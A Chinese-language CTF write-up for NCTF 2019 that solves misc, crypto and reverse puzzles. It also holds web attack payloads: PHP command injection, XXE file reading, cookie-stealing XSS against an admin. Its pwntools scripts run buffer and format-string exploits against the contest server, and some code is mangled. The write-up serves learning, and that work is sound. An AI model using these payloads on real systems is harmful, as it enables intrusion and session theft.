2019NCTF(some)

2019NCTF(some)

十一月 25, 2019

2019-NCTF

是什么压垮了我的身躯,是沉重的专业课作业!!!这次比赛的时间刚好要我这个萌新肝作业,本来就菜,还遭遇如此变故,太难了。。。只来得及看了一点点题目时间就不够用了,唉,叭说了

MISC

问卷调查

做个问卷,无坑,还以为会在问卷里面遇到什么坑呢

pip install

这个题一开始没反应过来,作业使我僵化emmm

pip install --user 2019xxxxxx的命令安装pip库之后去查看该库的文件,只有安装记录和一个py脚本,内容是flag已经在本地了。

想到应该是安装脚本有东西,wget下载库包,直接查看其中的setup.py,发现东西

1
2
3
4
5
6
7
import tempfile
from os import path, system

tmp_file = tempfile.gettempdir() + path.sep + '.f14g_is_here'
f = open(tmp_file, 'w')
f.write('TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9')
f.close()

它在本地临时文件夹留下了.f14g_is_here,内容为TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9,直觉base64。

a_good_idea

直接改后缀解压缩,拿到俩张图一个hint

hint:寻找像素中的秘密

一开始以为是盲水印,发现没东西,用Stegsolve.jar对比俩张图也没东西,最后想到好久没见过的容差对比,用Beyond_Compare加载俩张图片直接看到二维码,扫码得flag

键盘侠

winhex查看,发现结尾数据不是图片结尾,是word文档,搜索FFD9,从图片数据结尾处手动提取出word数据保存出来。打开发现只有一句话,说有一串奇怪的字符,查看隐藏文字拿到该字符串

image-20191125164149476

image-20191125164758131

带特殊字符,长得像uu,一开始以为是uu,解不通,遂遍历各加密,其皆带殊字,无解,仅余base族未试,奈何需付费,终弃之。后经佬告知,python3.x的base64库带有base64以上的解密算法,可直接用。。。哭~~

最后用 python3 的 base85 解码得flag

what‘s this

存在压缩包,导出,解压得到.txt文件。

image-20191125195513454

image-20191125195540251

Base64隐写,跑一下脚本就行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import base64
f = open("What1s7his.txt","r")
data = f.readlines()
f.close()
print ord('N'),ord('C'),ord('T')

for i in data:
str=''
for j in i:
str+=j
if j=='=':
break
a=0
for j in base64.b64decode(str):
if ord(j)<=126 and ord(j)>=32:
a+=1
if a==32:
print base64.b64decode(str)

Crypto

Keyboard

​ ooo yyy ii w uuu ee uuuu yyy uuuu y w uuu i i rr w i i rr rrr uuuu rrr uuuu t ii uuuu i w u rrr ee www ee yyy eee www w tt ee

都是26键第一行字母,和上面数字对应

​ q-1 w-2 e-3 r-4 t-5 y-6 u-7 i-8 o-9 p-0

9键对应过去

y 999 o 666 u 88 a 2 r 777 e 33 s 7777 o 666 s 7777

m 6 a 2 r 777 t 8 t 8 h 44 a 2 t 8 t 8 h 44 i 444

s 7777 i 444 s 7777 j 5 u 88 s 7777 t 8 a 2 p 7 i 444

e 33 c 222 e 33 o 666 f 333 c 222 a 2 k 55 e 33

NCTF{youaresosmartthatthisisjustapieceofcake}

babyrsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# -*- coding: utf-8 -*-

from Crypto.Util.number import *
import gmpy2
import binascii
a = 0
b=[]
f=[2,2,2,2,2,2,3,5,7,7,29,31,61,101,33871,91781,112939]
e = 0x10001
d = 19275778946037899718035455438175509175723911466127462154506916564101519923603308900331427601983476886255849200332374081996442976307058597390881168155862238533018621944733299208108185814179466844504468163200369996564265921022888670062554504758512453217434777820468049494313818291727050400752551716550403647148197148884408264686846693842118387217753516963449753809860354047619256787869400297858568139700396567519469825398575103885487624463424429913017729585620877168171603444111464692841379661112075123399343270610272287865200880398193573260848268633461983435015031227070217852728240847398084414687146397303110709214913
c = 5382723168073828110696168558294206681757991149022777821127563301413483223874527233300721180839298617076705685041174247415826157096583055069337393987892262764211225227035880754417457056723909135525244957935906902665679777101130111392780237502928656225705262431431953003520093932924375902111280077255205118217436744112064069429678632923259898627997145803892753989255615273140300021040654505901442787810653626524305706316663169341797205752938755590056568986738227803487467274114398257187962140796551136220532809687606867385639367743705527511680719955380746377631156468689844150878381460560990755652899449340045313521804

def dfs(i,s):
if(i==16):
global a
if(s<120000):
b.append(s)
a +=1
if(s*f[i]<120000):
b.append(s*f[i])
a +=1
else:
dfs(i+1,s)
dfs(i+1,s*f[i])

def nextPrime(n):
n += 2 if n & 1 else 1
while not isPrime(n):
n += 2
return n

x = e * d - 1
dfs(0,1)
for j in range(a):
xx = x // b[j]
for i in range(0,2000):
xxx = xx + i * i
if(gmpy2.iroot(xxx,2)[1]==1):
p=gmpy2.iroot(xxx,2)[0] - i + 1
q = nextPrime(p)
n=p*q
m = pow(c,d,n)
m_hex = hex(m)[2:]
print((binascii.a2b_hex(m_hex)))

childyrsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from Crypto.Util.number import *
import gmpy2
import binascii
import fractions

n = 32849718197337581823002243717057659218502519004386996660885100592872201948834155543125924395614928962750579667346279456710633774501407292473006312537723894221717638059058796679686953564471994009285384798450493756900459225040360430847240975678450171551048783818642467506711424027848778367427338647282428667393241157151675410661015044633282064056800913282016363415202171926089293431012379261585078566301060173689328363696699811123592090204578098276704877408688525618732848817623879899628629300385790344366046641825507767709276622692835393219811283244303899850483748651722336996164724553364097066493953127153066970594638491950199605713033004684970381605908909693802373826516622872100822213645899846325022476318425889580091613323747640467299866189070780620292627043349618839126919699862580579994887507733838561768581933029077488033326056066378869170169389819542928899483936705521710423905128732013121538495096959944889076705471928490092476616709838980562233255542325528398956185421193665359897664110835645928646616337700617883946369110702443135980068553511927115723157704586595844927607636003501038871748639417378062348085980873502535098755568810971926925447913858894180171498580131088992227637341857123607600275137768132347158657063692388249513
c = 26308018356739853895382240109968894175166731283702927002165268998773708335216338997058314157717147131083296551313334042509806229853341488461087009955203854253313827608275460592785607739091992591431080342664081962030557042784864074533380701014585315663218783130162376176094773010478159362434331787279303302718098735574605469803801873109982473258207444342330633191849040553550708886593340770753064322410889048135425025715982196600650740987076486540674090923181664281515197679745907830107684777248532278645343716263686014941081417914622724906314960249945105011301731247324601620886782967217339340393853616450077105125391982689986178342417223392217085276465471102737594719932347242482670320801063191869471318313514407997326350065187904154229557706351355052446027159972546737213451422978211055778164578782156428466626894026103053360431281644645515155471301826844754338802352846095293421718249819728205538534652212984831283642472071669494851823123552827380737798609829706225744376667082534026874483482483127491533474306552210039386256062116345785870668331513725792053302188276682550672663353937781055621860101624242216671635824311412793495965628876036344731733142759495348248970313655381407241457118743532311394697763283681852908564387282605279108
e = 0x10001
a = 2
sqr=int(gmpy2.iroot(n,2)[0])

for p in sieve_base:
i = 1
for j in range(1):
​ i *=p
if(i>sqr):
break
a = a*i

p=fractions.gcd(pow(3,a,n)-1,n)
q=n//p
phi_n = (p-1)*(q-1)
d = gmpy2.invert(e, phi_n)
m = pow(c,d,n)
m_hex = hex(m)[2:]

print((binascii.a2b_hex(m_hex)))

NCTF{Th3r3_ar3_1ns3cure_RSA_m0duli_7hat_at_f1rst_gl4nce_appe4r_t0_be_s3cur3}

sore

Vigenere Cipher ,没跑出来

Re

签到

真就签到鸭

image-20191125200000138

开头那个函数没啥用,sub_401340(&v4)用到了我们的输入,进去发现是一堆方程

image-20191125201907307

方程的运算结果已给出,用z3跑一下就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from z3 import *

solver = Solver()

flag = [Int('flag%d'%i) for i in range(49)]
for i in range(49):
solver.add(flag[i]>=32)
solver.add(flag[i]<=127)

str = [0,0,
18564, 37316, 32053, 33278, 23993, 33151, 15248, 13719, 34137, 27391, 28639, 18453, 28465, 12384, 20780, 45085, 35827, 37243, 26037, 39409, 17583, 20825, 44474, 35138, 36914, 25918, 38915, 17672, 21219, 43935, 37072, 39359, 27793, 41447, 18098, 21335, 46164, 38698, 39084, 29205, 40913, 19117, 21786, 46573, 38322, 41017, 29298, 43409, 19655]

solver.add(str[2] == 34 * flag[3] + 12 * flag[0] + 53 * flag[1] + 6 * flag[2] + 58 * flag[4] + 36 * flag[5] + flag[6])
solver.add(str[3] == 27 * flag[4] + 73 * flag[3] + 12 * flag[2] + 83 * flag[0] + 85 * flag[1] + 96 * flag[5] + 52 * flag[6])
solver.add(str[4] == 24 * flag[2] + 78 * flag[0] + 53 * flag[1] + 36 * flag[3] + 86 * flag[4] + 25 * flag[5] + 46 * flag[6])
solver.add(str[5] == 78 * flag[1] + 39 * flag[0] + 52 * flag[2] + 9 * flag[3] + 62 * flag[4] + 37 * flag[5] + 84 * flag[6])
solver.add(str[6] == 48 * flag[4] + 6 * flag[1] + 23 * flag[0] + 14 * flag[2] + 74 * flag[3] + 12 * flag[5] + 83 * flag[6])
solver.add(str[7] == 15 * flag[5] + 48 * flag[4] + 92 * flag[2] + 85 * flag[1] + 27 * flag[0] + 42 * flag[3] + 72 * flag[6])
solver.add(str[8] == 26 * flag[5] + 67 * flag[3] + 6 * flag[1] + 4 * flag[0] + 3 * flag[2] + 68 * flag[6])
solver.add(str[9] == 34 * flag[10] + 12 * flag[7] + 53 * flag[8] + 6 * flag[9] + 58 * flag[11] + 36 * flag[12] + flag[13])
solver.add(str[10] == 27 * flag[11] + 73 * flag[10] + 12 * flag[9] + 83 * flag[7] + 85 * flag[8] + 96 * flag[12] + 52 * flag[13])
solver.add(str[11] == 24 * flag[9] + 78 * flag[7] + 53 * flag[8] + 36 * flag[10] + 86 * flag[11] + 25 * flag[12] + 46 * flag[13])
solver.add(str[12] == 78 * flag[8] + 39 * flag[7] + 52 * flag[9] + 9 * flag[10] + 62 * flag[11] + 37 * flag[12] + 84 * flag[13])
solver.add(str[13] == 48 * flag[11] + 6 * flag[8] + 23 * flag[7] + 14 * flag[9] + 74 * flag[10] + 12 * flag[12] + 83 * flag[13])
solver.add(str[14] == 15 * flag[12] + 48 * flag[11] + 92 * flag[9] + 85 * flag[8] + 27 * flag[7] + 42 * flag[10] + 72 * flag[13])
solver.add(str[15] == 26 * flag[12] + 67 * flag[10] + 6 * flag[8] + 4 * flag[7] + 3 * flag[9] + 68 * flag[13])
solver.add(str[16] == 34 * flag[17] + 12 * flag[14] + 53 * flag[15] + 6 * flag[16] + 58 * flag[18] + 36 * flag[19] + flag[20])
solver.add(str[17] == 27 * flag[18] + 73 * flag[17] + 12 * flag[16] + 83 * flag[14] + 85 * flag[15] + 96 * flag[19] + 52 * flag[20])
solver.add(str[18] == 24 * flag[16] + 78 * flag[14] + 53 * flag[15] + 36 * flag[17] + 86 * flag[18] + 25 * flag[19] + 46 * flag[20])
solver.add(str[19] == 78 * flag[15] + 39 * flag[14] + 52 * flag[16] + 9 * flag[17] + 62 * flag[18] + 37 * flag[19] + 84 * flag[20])
solver.add(str[20] == 48 * flag[18] + 6 * flag[15] + 23 * flag[14] + 14 * flag[16] + 74 * flag[17] + 12 * flag[19] + 83 * flag[20])
solver.add(str[21] == 15 * flag[19] + 48 * flag[18] + 92 * flag[16] + 85 * flag[15] + 27 * flag[14] + 42 * flag[17] + 72 * flag[20])
solver.add(str[22] == 26 * flag[19] + 67 * flag[17] + 6 * flag[15] + 4 * flag[14] + 3 * flag[16] + 68 * flag[20])
solver.add(str[23] == 34 * flag[24] + 12 * flag[21] + 53 * flag[22] + 6 * flag[23] + 58 * flag[25] + 36 * flag[26] + flag[27])
solver.add(str[24] == 27 * flag[25] + 73 * flag[24] + 12 * flag[23] + 83 * flag[21] + 85 * flag[22] + 96 * flag[26] + 52 * flag[27])
solver.add(str[25] == 24 * flag[23] + 78 * flag[21] + 53 * flag[22] + 36 * flag[24] + 86 * flag[25] + 25 * flag[26] + 46 * flag[27])
solver.add(str[26] == 78 * flag[22] + 39 * flag[21] + 52 * flag[23] + 9 * flag[24] + 62 * flag[25] + 37 * flag[26] + 84 * flag[27])
solver.add(str[27] == 48 * flag[25] + 6 * flag[22] + 23 * flag[21] + 14 * flag[23] + 74 * flag[24] + 12 * flag[26] + 83 * flag[27])
solver.add(str[28] == 15 * flag[26] + 48 * flag[25] + 92 * flag[23] + 85 * flag[22] + 27 * flag[21] + 42 * flag[24] + 72 * flag[27])
solver.add(str[29] == 26 * flag[26] + 67 * flag[24] + 6 * flag[22] + 4 * flag[21] + 3 * flag[23] + 68 * flag[27])
solver.add(str[30] == 34 * flag[31] + 12 * flag[28] + 53 * flag[29] + 6 * flag[30] + 58 * flag[32] + 36 * flag[33] + flag[34])
solver.add(str[31] == 27 * flag[32] + 73 * flag[31] + 12 * flag[30] + 83 * flag[28] + 85 * flag[29] + 96 * flag[33] + 52 * flag[34])
solver.add(str[32] == 24 * flag[30] + 78 * flag[28] + 53 * flag[29] + 36 * flag[31] + 86 * flag[32] + 25 * flag[33] + 46 * flag[34])
solver.add(str[33] == 78 * flag[29] + 39 * flag[28] + 52 * flag[30] + 9 * flag[31] + 62 * flag[32] + 37 * flag[33] + 84 * flag[34])
solver.add(str[34] == 48 * flag[32] + 6 * flag[29] + 23 * flag[28] + 14 * flag[30] + 74 * flag[31] + 12 * flag[33] + 83 * flag[34])
solver.add(str[35] == 15 * flag[33] + 48 * flag[32] + 92 * flag[30] + 85 * flag[29] + 27 * flag[28] + 42 * flag[31] + 72 * flag[34])
solver.add(str[36] == 26 * flag[33] + 67 * flag[31] + 6 * flag[29] + 4 * flag[28] + 3 * flag[30] + 68 * flag[34])
solver.add(str[37] == 34 * flag[38] + 12 * flag[35] + 53 * flag[36] + 6 * flag[37] + 58 * flag[39] + 36 * flag[40] + flag[41])
solver.add(str[38] == 27 * flag[39] + 73 * flag[38] + 12 * flag[37] + 83 * flag[35] + 85 * flag[36] + 96 * flag[40] + 52 * flag[41])
solver.add(str[39] == 24 * flag[37] + 78 * flag[35] + 53 * flag[36] + 36 * flag[38] + 86 * flag[39] + 25 * flag[40] + 46 * flag[41])
solver.add(str[40] == 78 * flag[36] + 39 * flag[35] + 52 * flag[37] + 9 * flag[38] + 62 * flag[39] + 37 * flag[40] + 84 * flag[41])
solver.add(str[41] == 48 * flag[39] + 6 * flag[36] + 23 * flag[35] + 14 * flag[37] + 74 * flag[38] + 12 * flag[40] + 83 * flag[41])
solver.add(str[42] == 15 * flag[40] + 48 * flag[39] + 92 * flag[37] + 85 * flag[36] + 27 * flag[35] + 42 * flag[38] + 72 * flag[41])
solver.add(str[43] == 26 * flag[40] + 67 * flag[38] + 6 * flag[36] + 4 * flag[35] + 3 * flag[37] + 68 * flag[41])
solver.add(str[44] == 34 * flag[45] + 12 * flag[42] + 53 * flag[43] + 6 * flag[44] + 58 * flag[46] + 36 * flag[47] + flag[48])
solver.add(str[45] == 27 * flag[46] + 73 * flag[45] + 12 * flag[44] + 83 * flag[42] + 85 * flag[43] + 96 * flag[47] + 52 * flag[48])
solver.add(str[46] == 24 * flag[44] + 78 * flag[42] + 53 * flag[43] + 36 * flag[45] + 86 * flag[46] + 25 * flag[47] + 46 * flag[48])
solver.add(str[47] == 78 * flag[43] + 39 * flag[42] + 52 * flag[44] + 9 * flag[45] + 62 * flag[46] + 37 * flag[47] + 84 * flag[48])
solver.add(str[48] == 48 * flag[46] + 6 * flag[43] + 23 * flag[42] + 14 * flag[44] + 74 * flag[45] + 12 * flag[47] + 83 * flag[48])
solver.add(str[49] == 15 * flag[47] + 48 * flag[46] + 92 * flag[44] + 85 * flag[43] + 27 * flag[42] + 42 * flag[45] + 72 * flag[48])
solver.add(str[50] == 26 * flag[47] + 67 * flag[45] + 6 * flag[43] + 4 * flag[42] + 3 * flag[44] + 68 * flag[48])

if solver.check() == sat:
m = solver.model()
s = []
for i in range(49):
s.append(m[flag[i]].as_long())
print(bytes(s))
print s
else:
print('error')

str=''
for i in s:
print i
str+=chr(i)

print str

debug

image-20191125202546147

ida查看反编译源码,发现输入直接和字符串s**

Our 16bit Games

ida反编译在程序末尾发现一连串输出,其将一连串数据分别与ds:0fa2、ds:0fa4的值进行异或,应该就是flag了

image-20191125203551803

通过反推,发现ds:0fa2位置的参数通过了一连串检验,由检验算法可推出关键参数,c0h、deh

image-20191125204003878

1
2
3
4
5
6
7
8

a=[0x8E, 0x9D, 0xDA, xCD, 0x21, 0x86, 0xDF, 0xB4, 0x02, 0x94, 0x21, 0x86, 0xDF, 0xB4, x02, 0x98, , 0xBB, , 0x89, , 0xF3, , 0xEF, , 0x83, , 0xEE, , 0xAD, 0xB2, 0x9B,0x9F, ,0xEC, , 0x9F,0x9A, 0xF0, , 0xEB,0x9F, ,0x97, , 0xF6,0xBC, ,0xF1, 0xE9,0x9F, ,0xE7, , 0xA1,0xB3, 0xF3, 0xA3]

for i in range(30):
if i % 2 == 0:
a[i]=a[i]^0xc0
else:
a[i]=a[i]^0xde

WEB

Fake XML cookbook

题目提示flag在/flag
填写user和passwd之后抓包,经过测试在user处存在xxe
直接读flag

True XML cookbook

和上题一样xxe,提示要用xxe做更多东西
尝试下内网探测

Easyphp

第一关 绕过正则 num=23333%0a
第二关 str1纯数字,md5后str1和str2不相等,把cxhp换成0123后弱相等
写脚本跑出一个开头0e或者ce,后面字符串经过替换后为纯数字的纯数字字符串就是str1
Str1=9427417
Str2和str1类似,开头开头0e或者ce,后面字符串经过替换后为纯数字的字符串即为str2(str1和str2经过md5后不能同时0e开头且后面字符串为纯数字)
Str2=q0000653f8c
第三关
php中.会解析成_,q.w.q绕过第一个if
第二个if貌似没什么用
第三个if不能用cat
而且命令长度不能大于8
Ls看下当前目录发现flag文件,忘了叫啥名字挺长超过8了fl开头的
用通配符可以绕过
Cmd=tac fl*
Payload: num=23333%0a&str1=9427417&str2=q0000653f8c&q.w.q=tac%20fl*
Simple Xss
注册账号,登陆,发现可以给任何人发送消息,简单测试消息处存在xss
无任何过滤
给admin发打cookie的xss
抓到cookie浏览器修改本地cookie,F5,flag到手。。

pwn

hello pwn

1
2
3
4
5
from pwn import *

io = remote("139.129.76.65",50003)

io.interactive()

pwn me years!(I)

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
#r = process("./pwn_me_1")
r = remote('139.129.76.65',50004)
payload = 'yes\x00' + 'a'*12 + p64(0x66666666) + '\x00'
#gdb.attach(r)
r.sendline(payload)

r.interactive()

pwn me years!(II)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
#r = process('./2')
r = remote('139.129.76.65',50005)
offset = 0x10
r.recvuntil('your name:\n')
r.sendline('a' * offset + '%p')
r.recvuntil('ring......\n')
get = r.recv(14)
#get = u64(r.recv()[0:6].ljust(8,'\x00'))
print 'leak = ' + get
get = int(get,16) - 0x202080
print 'addr = ' + hex(get)
target = get + 0x0000000002020E0
one = 0x66666666
target_len = len(str(target))
print 'target = ' + hex(target)

payload = "%" + str(0x6666) + "c%9$hn%10$hn"
payload = payload.ljust(0x18,"\x00")
payload += p64(target) + p64(target+2)
r.sendline(payload)
'''
payload="%" + str((one>>16)&0xffff)+'c'+"%9$hn"
payload+=p64(target+2)
r.recvuntil('you want?\n')
gdb.attach(r)
r.sendline(payload)
'''
r.interactive()
隐藏